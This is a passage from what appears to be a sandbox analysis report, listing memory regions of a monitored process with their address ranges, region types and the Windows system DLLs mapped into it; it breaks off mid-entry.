Region: id = 716 start_va = 0x1850000 end_va = 0x185ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001850000" filename = "" Region: id = 717 start_va = 0x1860000 end_va = 0x186ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001860000" filename = "" Region: id = 718 start_va = 0x1870000 end_va = 0x187ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001870000" filename = "" Region: id = 719 start_va = 0x1880000 end_va = 0x18fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001880000" filename = "" Region: id = 720 start_va = 0x1950000 end_va = 0x19cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001950000" filename = "" Region: id = 721 start_va = 0x19f0000 end_va = 0x1a6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000019f0000" filename = "" Region: id = 722 start_va = 0x1ac0000 end_va = 0x1b3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001ac0000" filename = "" Region: id = 723 start_va = 0x1b70000 end_va = 0x1beffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001b70000" filename = "" Region: id = 724 start_va = 0x1c30000 end_va = 0x1d2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001c30000" filename = "" Region: id = 725 start_va = 0x1d30000 end_va = 0x1e2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001d30000" filename = "" Region: id = 726 start_va = 0x1e30000 end_va = 0x1eaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e30000" filename = "" Region: id = 727 start_va = 0x1ee0000 end_va = 0x1f5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001ee0000" filename = "" Region: id = 728 start_va = 0x1f60000 end_va = 0x1fdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f60000" filename = "" Region: id = 729 start_va = 0x2020000 end_va = 0x209ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002020000" filename = "" Region: id = 730 start_va = 0x2100000 end_va = 0x217ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002100000" filename = "" Region: id = 731 start_va = 0x21f0000 end_va = 0x226ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021f0000" filename = "" Region: id = 732 start_va = 0x2280000 end_va = 0x22fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002280000" filename = "" Region: id = 733 start_va = 0x2300000 end_va = 0x23fffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002300000" filename = "" Region: id = 734 start_va = 0x2410000 end_va = 0x248ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002410000" filename = "" Region: id = 735 start_va = 0x24a0000 end_va = 0x251ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000024a0000" filename = "" Region: id = 736 start_va = 0x2520000 end_va = 0x261ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002520000" filename = "" Region: id = 737 start_va = 0x2620000 end_va = 0x269ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 738 start_va = 0x26d0000 end_va = 0x26dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 739 start_va = 0x26e0000 end_va = 0x27dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026e0000" filename = "" Region: id = 740 start_va = 0x2830000 end_va = 0x283ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002830000" filename = "" Region: id = 741 start_va = 0x28b0000 end_va = 0x292ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000028b0000" filename = "" Region: id = 742 start_va = 0x2980000 end_va = 0x29fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002980000" filename = "" Region: id = 743 start_va = 0x2a10000 end_va = 0x2a8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002a10000" filename = "" Region: id = 744 start_va = 0x2ac0000 end_va = 0x2b3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002ac0000" filename = "" Region: id = 745 start_va = 0x2b40000 end_va = 0x2bbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002b40000" filename = "" Region: id = 746 start_va = 0x2bc0000 end_va = 0x2c3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002bc0000" filename = "" Region: id = 747 start_va = 0x2ce0000 end_va = 0x2d5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002ce0000" filename = "" Region: id = 748 start_va = 0x2d60000 end_va = 0x2e5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002d60000" filename = "" Region: id = 749 start_va = 0x2e60000 end_va = 0x305ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002e60000" filename = "" Region: id = 750 start_va = 0x3060000 end_va = 0x315ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003060000" filename = "" Region: id = 751 start_va = 0x3170000 end_va = 0x31effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003170000" filename = "" Region: id = 752 start_va = 0x3200000 end_va = 0x327ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003200000" filename = "" Region: id = 753 start_va = 0x3290000 end_va = 0x32cffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003290000" filename = "" Region: id = 754 start_va = 0x32d0000 end_va = 0x330ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000032d0000" filename = "" Region: id = 755 start_va = 0x3320000 end_va = 0x339ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003320000" filename = "" Region: id = 756 start_va = 0x33b0000 end_va = 0x342ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000033b0000" filename = "" Region: id = 757 start_va = 0x3430000 end_va = 0x34affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003430000" filename = "" Region: id = 758 start_va = 0x3520000 end_va = 0x359ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003520000" filename = "" Region: id = 759 start_va = 0x35a0000 end_va = 0x399ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035a0000" filename = "" Region: id = 760 start_va = 0x39b0000 end_va = 0x3a2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000039b0000" filename = "" Region: id = 761 start_va = 0x3ae0000 end_va = 0x3b9ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 762 start_va = 0x3bd0000 end_va = 0x3c4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003bd0000" filename = "" Region: id = 763 start_va = 0x3c60000 end_va = 0x3d5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003c60000" filename = "" Region: id = 764 start_va = 0x3d60000 end_va = 0x3e5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d60000" filename = "" Region: id = 765 start_va = 0x3e60000 end_va = 0x3f5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003e60000" filename = "" Region: id = 766 start_va = 0x3f60000 end_va = 0x405ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003f60000" filename = "" Region: id = 767 start_va = 0x4060000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004060000" filename = "" Region: id = 768 start_va = 0x4180000 end_va = 0x41fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004180000" filename = "" Region: id = 769 start_va = 0x4220000 end_va = 0x429ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004220000" filename = "" Region: id = 770 start_va = 0x42a0000 end_va = 0x439ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000042a0000" filename = "" Region: id = 771 start_va = 0x43a0000 end_va = 0x539ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000043a0000" filename = "" Region: id = 772 start_va = 0x5410000 end_va = 0x548ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005410000" filename = "" Region: id = 773 start_va = 0x5490000 end_va = 0x550ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005490000" filename = "" Region: id = 774 start_va = 0x5530000 end_va = 0x55affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005530000" filename = "" Region: id = 775 start_va = 0x55e0000 end_va = 0x565ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000055e0000" filename = "" Region: id = 776 start_va = 0x5690000 end_va = 0x570ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005690000" filename = "" Region: id = 777 start_va = 0x5740000 end_va = 0x57bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005740000" filename = "" Region: id = 778 start_va = 0x5840000 end_va = 0x58bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005840000" filename = "" Region: id = 779 start_va = 0x58d0000 end_va = 0x594ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000058d0000" filename = "" Region: id = 780 start_va = 0x59b0000 end_va = 0x5a2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000059b0000" filename = "" Region: id = 781 start_va = 0x5ac0000 end_va = 0x5b3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005ac0000" filename = "" Region: id = 782 start_va = 0x5b50000 end_va = 0x5bcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005b50000" filename = "" Region: id = 783 start_va = 0x5c70000 end_va = 0x5ceffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005c70000" filename = "" Region: id = 784 start_va = 0x5d40000 end_va = 0x5dbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005d40000" filename = "" Region: id = 785 start_va = 0x5e10000 end_va = 0x5e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005e10000" filename = "" Region: id = 786 start_va = 0x5e90000 end_va = 0x608ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005e90000" filename = "" Region: id = 787 start_va = 0x60b0000 end_va = 0x612ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000060b0000" filename = "" Region: id = 788 start_va = 0x6130000 end_va = 0x61affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006130000" filename = "" Region: id = 789 start_va = 0x6200000 end_va = 0x627ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006200000" filename = "" Region: id = 790 start_va = 0x6310000 end_va = 0x638ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006310000" filename = "" Region: id = 791 start_va = 0x77060000 end_va = 0x77159fff monitored = 0 entry_point = 0x7707a2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 792 start_va = 0x77160000 end_va = 0x7727efff monitored = 0 entry_point = 0x77175340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 793 start_va = 0x77280000 end_va = 0x77428fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 794 start_va = 0x77450000 end_va = 0x77456fff monitored = 0 entry_point = 0x7745106c region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\System32\\psapi.dll" (normalized: "c:\\windows\\system32\\psapi.dll") Region: id = 795 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 796 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 797 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 798 start_va = 0xff110000 end_va = 0xff11afff monitored = 0 entry_point = 0xff11246c region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 799 start_va = 0x7fef3340000 end_va = 0x7fef3381fff monitored = 0 entry_point = 0x7fef3370048 region_type = mapped_file name = "tcpipcfg.dll" filename = "\\Windows\\System32\\tcpipcfg.dll" (normalized: "c:\\windows\\system32\\tcpipcfg.dll") Region: id = 800 start_va = 0x7fef3480000 end_va = 0x7fef3499fff monitored = 0 entry_point = 0x7fef3491ae4 region_type = mapped_file name = "rascfg.dll" filename = "\\Windows\\System32\\rascfg.dll" (normalized: "c:\\windows\\system32\\rascfg.dll") Region: id = 801 start_va = 0x7fef3570000 end_va = 0x7fef37c2fff monitored = 0 entry_point = 0x7fef357236c region_type = mapped_file name = "wuaueng.dll" filename = "\\Windows\\System32\\wuaueng.dll" (normalized: "c:\\windows\\system32\\wuaueng.dll") Region: id = 802 start_va = 0x7fef3cc0000 end_va = 0x7fef3ccefff monitored = 0 entry_point = 0x7fef3cc6894 region_type = mapped_file name = "ndiscapcfg.dll" filename = "\\Windows\\System32\\ndiscapCfg.dll" (normalized: "c:\\windows\\system32\\ndiscapcfg.dll") Region: id = 803 start_va = 0x7fef3cf0000 end_va = 0x7fef3d34fff monitored = 0 entry_point = 0x7fef3d23644 region_type = mapped_file name = "upnp.dll" filename = "\\Windows\\System32\\upnp.dll" (normalized: "c:\\windows\\system32\\upnp.dll") Region: id = 804 start_va = 0x7fef3d40000 end_va = 0x7fef3d51fff monitored = 0 entry_point = 0x7fef3d490bc region_type = mapped_file name = "bitsigd.dll" filename = "\\Windows\\System32\\bitsigd.dll" (normalized: "c:\\windows\\system32\\bitsigd.dll") Region: id = 805 start_va = 0x7fef3d60000 end_va = 0x7fef3d69fff monitored = 0 entry_point = 0x7fef3d63994 region_type = mapped_file name = "bitsperf.dll" filename = "\\Windows\\System32\\bitsperf.dll" (normalized: "c:\\windows\\system32\\bitsperf.dll") Region: id = 806 start_va = 0x7fef3d70000 end_va = 0x7fef3e41fff monitored = 0 entry_point = 0x7fef3e01a10 region_type = mapped_file name = "qmgr.dll" filename = "\\Windows\\System32\\qmgr.dll" (normalized: "c:\\windows\\system32\\qmgr.dll") Region: id = 807 start_va = 0x7fef5c80000 end_va = 0x7fef5c9bfff monitored = 0 entry_point = 0x7fef5c811a0 region_type = mapped_file name = "rasman.dll" filename = "\\Windows\\System32\\rasman.dll" (normalized: "c:\\windows\\system32\\rasman.dll") Region: id = 808 start_va = 0x7fef5ca0000 end_va = 0x7fef5d01fff monitored = 0 entry_point = 0x7fef5ca1198 region_type = mapped_file name = "rasapi32.dll" filename = "\\Windows\\System32\\rasapi32.dll" (normalized: "c:\\windows\\system32\\rasapi32.dll") Region: id = 809 start_va = 0x7fef5d10000 end_va = 0x7fef5d49fff monitored = 0 entry_point = 0x7fef5d11010 region_type = mapped_file name = "mprapi.dll" filename = "\\Windows\\System32\\mprapi.dll" (normalized: "c:\\windows\\system32\\mprapi.dll") Region: id = 810 start_va = 0x7fef6c80000 end_va = 0x7fef6ef9fff monitored = 0 entry_point = 0x7fef6cb2200 region_type = mapped_file name = "esent.dll" filename = "\\Windows\\System32\\esent.dll" (normalized: "c:\\windows\\system32\\esent.dll") Region: id = 811 start_va = 0x7fef6f00000 end_va = 0x7fef6f16fff monitored = 0 entry_point = 0x7fef6f09d50 region_type = mapped_file name = "ncprov.dll" filename = "\\Windows\\System32\\wbem\\NCProv.dll" (normalized: "c:\\windows\\system32\\wbem\\ncprov.dll") Region: id = 812 start_va = 0x7fef7080000 end_va = 0x7fef716dfff monitored = 0 entry_point = 0x7fef70812a0 region_type = mapped_file name = "actxprxy.dll" filename = "\\Windows\\System32\\actxprxy.dll" (normalized: "c:\\windows\\system32\\actxprxy.dll") Region: id = 813 start_va = 0x7fef8c00000 end_va = 0x7fef8c0bfff monitored = 0 entry_point = 0x7fef8c0602c region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 814 start_va = 0x7fef8c10000 end_va = 0x7fef8c1efff monitored = 0 entry_point = 0x7fef8c19a48 region_type = mapped_file name = "mspatcha.dll" filename = "\\Windows\\System32\\mspatcha.dll" (normalized: "c:\\windows\\system32\\mspatcha.dll") Region: id = 815 start_va = 0x7fef8c20000 end_va = 0x7fef8c3afff monitored = 0 entry_point = 0x7fef8c21198 region_type = mapped_file name = "cabinet.dll" filename = "\\Windows\\System32\\cabinet.dll" (normalized: "c:\\windows\\system32\\cabinet.dll") Region: id = 816 start_va = 0x7fef8ed0000 end_va = 0x7fef8ed7fff monitored = 0 entry_point = 0x7fef8ed1414 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 817 start_va = 0x7fef8ee0000 end_va = 0x7fef8f50fff monitored = 0 entry_point = 0x7fef8f251d0 region_type = mapped_file name = "wbemess.dll" filename = "\\Windows\\System32\\wbem\\wbemess.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemess.dll") Region: id = 818 start_va = 0x7fef8f60000 end_va = 0x7fef8f71fff monitored = 0 entry_point = 0x7fef8f689d0 region_type = mapped_file name = "ncobjapi.dll" filename = "\\Windows\\System32\\ncobjapi.dll" (normalized: "c:\\windows\\system32\\ncobjapi.dll") Region: id = 819 start_va = 0x7fef8f80000 end_va = 0x7fef9034fff monitored = 0 entry_point = 0x7fef8ffcf80 region_type = mapped_file name = "wmiprvsd.dll" filename = "\\Windows\\System32\\wbem\\WmiPrvSD.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiprvsd.dll") Region: id = 820 start_va = 0x7fef9040000 end_va = 0x7fef9058fff monitored = 0 entry_point = 0x7fef9041104 region_type = mapped_file name = "resutils.dll" filename = "\\Windows\\System32\\resutils.dll" (normalized: "c:\\windows\\system32\\resutils.dll") Region: id = 821 start_va = 0x7fef9060000 end_va = 0x7fef90affff monitored = 0 entry_point = 0x7fef9061190 region_type = mapped_file name = "clusapi.dll" filename = "\\Windows\\System32\\clusapi.dll" (normalized: "c:\\windows\\system32\\clusapi.dll") Region: id = 822 start_va = 0x7fef90b0000 end_va = 0x7fef90b7fff monitored = 0 entry_point = 0x7fef90b1020 region_type = mapped_file name = "sscore.dll" filename = "\\Windows\\System32\\sscore.dll" (normalized: "c:\\windows\\system32\\sscore.dll") Region: id = 823 start_va = 0x7fef90c0000 end_va = 0x7fef9119fff monitored = 0 entry_point = 0x7fef90fdde0 region_type = mapped_file name = "repdrvfs.dll" filename = "\\Windows\\System32\\wbem\\repdrvfs.dll" (normalized: "c:\\windows\\system32\\wbem\\repdrvfs.dll") Region: id = 824 start_va = 0x7fef9120000 end_va = 0x7fef9140fff monitored = 0 entry_point = 0x7fef91303b0 region_type = mapped_file name = "wmiutils.dll" filename = "\\Windows\\System32\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiutils.dll") Region: id = 825 start_va = 0x7fef9150000 end_va = 0x7fef91c3fff monitored = 0 entry_point = 0x7fef91566f0 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll") Region: id = 826 start_va = 0x7fef91d0000 end_va = 0x7fef923afff monitored = 0 entry_point = 0x7fef9214344 region_type = mapped_file name = "hnetcfg.dll" filename = "\\Windows\\System32\\hnetcfg.dll" (normalized: "c:\\windows\\system32\\hnetcfg.dll") Region: id = 827 start_va = 0x7fef9240000 end_va = 0x7fef9252fff monitored = 0 entry_point = 0x7fef9241d80 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll") Region: id = 828 start_va = 0x7fef9260000 end_va = 0x7fef92c1fff monitored = 0 entry_point = 0x7fef929bd80 region_type = mapped_file name = "esscli.dll" filename = "\\Windows\\System32\\wbem\\esscli.dll" (normalized: "c:\\windows\\system32\\wbem\\esscli.dll") Region: id = 829 start_va = 0x7fef92d0000 end_va = 0x7fef93fbfff monitored = 0 entry_point = 0x7fef9380ef0 region_type = mapped_file name = "wbemcore.dll" filename = "\\Windows\\System32\\wbem\\wbemcore.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemcore.dll") Region: id = 830 start_va = 0x7fef9400000 end_va = 0x7fef9419fff monitored = 0 entry_point = 0x7fef9413fbc region_type = mapped_file name = "nci.dll" filename = "\\Windows\\System32\\nci.dll" (normalized: "c:\\windows\\system32\\nci.dll") Region: id = 831 start_va = 0x7fef9420000 end_va = 0x7fef94a3fff monitored = 0 entry_point = 0x7fef9471118 region_type = mapped_file name = "netcfgx.dll" filename = "\\Windows\\System32\\netcfgx.dll" (normalized: "c:\\windows\\system32\\netcfgx.dll") Region: id = 832 start_va = 0x7fef94b0000 end_va = 0x7fef94d4fff monitored = 0 entry_point = 0x7fef94c8c54 region_type = mapped_file name = "browser.dll" filename = "\\Windows\\System32\\browser.dll" (normalized: "c:\\windows\\system32\\browser.dll") Region: id = 833 start_va = 0x7fef94e0000 end_va = 0x7fef951cfff monitored = 0 entry_point = 0x7fef94e1070 region_type = mapped_file name = "srvsvc.dll" filename = "\\Windows\\System32\\srvsvc.dll" (normalized: "c:\\windows\\system32\\srvsvc.dll") Region: id = 834 start_va = 0x7fef9520000 end_va = 0x7fef952dfff monitored = 0 entry_point = 0x7fef9525500 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 835 start_va = 0x7fef9530000 end_va = 0x7fef9556fff monitored = 0 entry_point = 0x7fef95311a0 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 836 start_va = 0x7fef9560000 end_va = 0x7fef9632fff monitored = 0 entry_point = 0x7fef95d8b00 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll") Region: id = 837 start_va = 0x7fef9680000 end_va = 0x7fef96c6fff monitored = 0 entry_point = 0x7fef9681040 region_type = mapped_file name = "wdscore.dll" filename = "\\Windows\\System32\\wdscore.dll" (normalized: "c:\\windows\\system32\\wdscore.dll") Region: id = 838 start_va = 0x7fef96d0000 end_va = 0x7fef9711fff monitored = 0 entry_point = 0x7fef96d17e4 region_type = mapped_file name = "sqmapi.dll" filename = "\\Windows\\System32\\sqmapi.dll" (normalized: "c:\\windows\\system32\\sqmapi.dll") Region: id = 839 start_va = 0x7fef9720000 end_va = 0x7fef97b1fff monitored = 0 entry_point = 0x7fef97951ec region_type = mapped_file name = "iphlpsvc.dll" filename = "\\Windows\\System32\\iphlpsvc.dll" (normalized: "c:\\windows\\system32\\iphlpsvc.dll") Region: id = 840 start_va = 0x7fef97c0000 end_va = 0x7fef9836fff monitored = 0 entry_point = 0x7fef97fe7f0 region_type = mapped_file name = "wbemcomn2.dll" filename = "\\Windows\\System32\\wbemcomn2.dll" (normalized: "c:\\windows\\system32\\wbemcomn2.dll") Region: id = 841 start_va = 0x7fef9840000 end_va = 0x7fef9879fff monitored = 0 entry_point = 0x7fef985d020 region_type = mapped_file name = "wmisvc.dll" filename = "\\Windows\\System32\\wbem\\WMIsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wmisvc.dll") Region: id = 842 start_va = 0x7fef9b30000 end_va = 0x7fef9b40fff monitored = 0 entry_point = 0x7fef9b39e7c region_type = mapped_file name = "ssdpapi.dll" filename = "\\Windows\\System32\\ssdpapi.dll" (normalized: "c:\\windows\\system32\\ssdpapi.dll") Region: id = 843 start_va = 0x7fef9b50000 end_va = 0x7fef9bb3fff monitored = 0 entry_point = 0x7fef9b51254 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll") Region: id = 844 start_va = 0x7fef9bc0000 end_va = 0x7fef9c30fff monitored = 0 entry_point = 0x7fef9bc1010 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 845 start_va = 0x7fef9cf0000 end_va = 0x7fef9d06fff monitored = 0 entry_point = 0x7fef9cf1060 region_type = mapped_file name = "vsstrace.dll" filename = "\\Windows\\System32\\vsstrace.dll" (normalized: "c:\\windows\\system32\\vsstrace.dll") Region: id = 846 start_va = 0x7fef9d10000 end_va = 0x7fef9ebffff monitored = 0 entry_point = 0x7fef9d11010 region_type = mapped_file name = "vssapi.dll" filename = "\\Windows\\System32\\vssapi.dll" (normalized: "c:\\windows\\system32\\vssapi.dll") Region: id = 847 start_va = 0x7fefa1a0000 end_va = 0x7fefa1a8fff monitored = 0 entry_point = 0x7fefa1a11a0 region_type = mapped_file name = "tschannel.dll" filename = "\\Windows\\System32\\TSChannel.dll" (normalized: "c:\\windows\\system32\\tschannel.dll") Region: id = 848 start_va = 0x7fefa3b0000 end_va = 0x7fefa426fff monitored = 0 entry_point = 0x7fefa3bafd0 region_type = mapped_file name = "taskcomp.dll" filename = "\\Windows\\System32\\taskcomp.dll" (normalized: "c:\\windows\\system32\\taskcomp.dll") Region: id = 849 start_va = 0x7fefa430000 end_va = 0x7fefa439fff monitored = 0 entry_point = 0x7fefa43260c region_type = mapped_file name = "ktmw32.dll" filename = "\\Windows\\System32\\ktmw32.dll" (normalized: "c:\\windows\\system32\\ktmw32.dll") Region: id = 850 start_va = 0x7fefa440000 end_va = 0x7fefa551fff monitored = 0 entry_point = 0x7fefa45f354 region_type = mapped_file name = "schedsvc.dll" filename = "\\Windows\\System32\\schedsvc.dll" (normalized: "c:\\windows\\system32\\schedsvc.dll") Region: id = 851 start_va = 0x7fefa560000 end_va = 0x7fefa56efff monitored = 0 entry_point = 0x7fefa567e80 region_type = mapped_file name = "wiarpc.dll" filename = "\\Windows\\System32\\wiarpc.dll" (normalized: "c:\\windows\\system32\\wiarpc.dll") Region: id = 852 start_va = 0x7fefa570000 end_va = 0x7fefa578fff monitored = 0 entry_point = 0x7fefa573668 region_type = mapped_file name = "fvecerts.dll" filename = "\\Windows\\System32\\fvecerts.dll" (normalized: "c:\\windows\\system32\\fvecerts.dll") Region: id = 853 start_va = 0x7fefa580000 end_va = 0x7fefa588fff monitored = 0 entry_point = 0x7fefa581020 region_type = mapped_file name = "tbs.dll" filename = "\\Windows\\System32\\tbs.dll" (normalized: "c:\\windows\\system32\\tbs.dll") Region: id = 854 start_va = 0x7fefa590000 end_va = 0x7fefa5e5fff monitored = 0 entry_point = 0x7fefa591040 region_type = mapped_file name = "fveapi.dll" filename = "\\Windows\\System32\\fveapi.dll" (normalized: "c:\\windows\\system32\\fveapi.dll") Region: id = 855 start_va = 0x7fefa5f0000 end_va = 0x7fefa64dfff monitored = 0 entry_point = 0x7fefa5f9024 region_type = mapped_file name = "shsvcs.dll" filename = "\\Windows\\System32\\shsvcs.dll" (normalized: "c:\\windows\\system32\\shsvcs.dll") Region: id = 856 start_va = 0x7fefa650000 end_va = 0x7fefa667fff monitored = 0 entry_point = 0x7fefa651bf8 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 857 start_va = 0x7fefa670000 end_va = 0x7fefa680fff monitored = 0 entry_point = 0x7fefa6716ac region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 858 start_va = 0x7fefa6a0000 end_va = 0x7fefa6f2fff monitored = 0 entry_point = 0x7fefa6a2b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 859 start_va = 0x7fefac10000 end_va = 0x7fefac2cfff monitored = 0 entry_point = 0x7fefac12f18 region_type = mapped_file name = "mmcss.dll" filename = "\\Windows\\System32\\mmcss.dll" (normalized: "c:\\windows\\system32\\mmcss.dll") Region: id = 860 start_va = 0x7fefac70000 end_va = 0x7fefac84fff monitored = 0 entry_point = 0x7fefac71020 region_type = mapped_file name = "appinfo.dll" filename = "\\Windows\\System32\\appinfo.dll" (normalized: "c:\\windows\\system32\\appinfo.dll") Region: id = 861 start_va = 0x7fefac90000 end_va = 0x7fefaca3fff monitored = 0 entry_point = 0x7fefac93e64 region_type = mapped_file name = "sens.dll" filename = "\\Windows\\System32\\Sens.dll" (normalized: "c:\\windows\\system32\\sens.dll") Region: id = 862 start_va = 0x7fefacb0000 end_va = 0x7fefacbafff monitored = 0 entry_point = 0x7fefacb1198 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 863 start_va = 0x7fefacc0000 end_va = 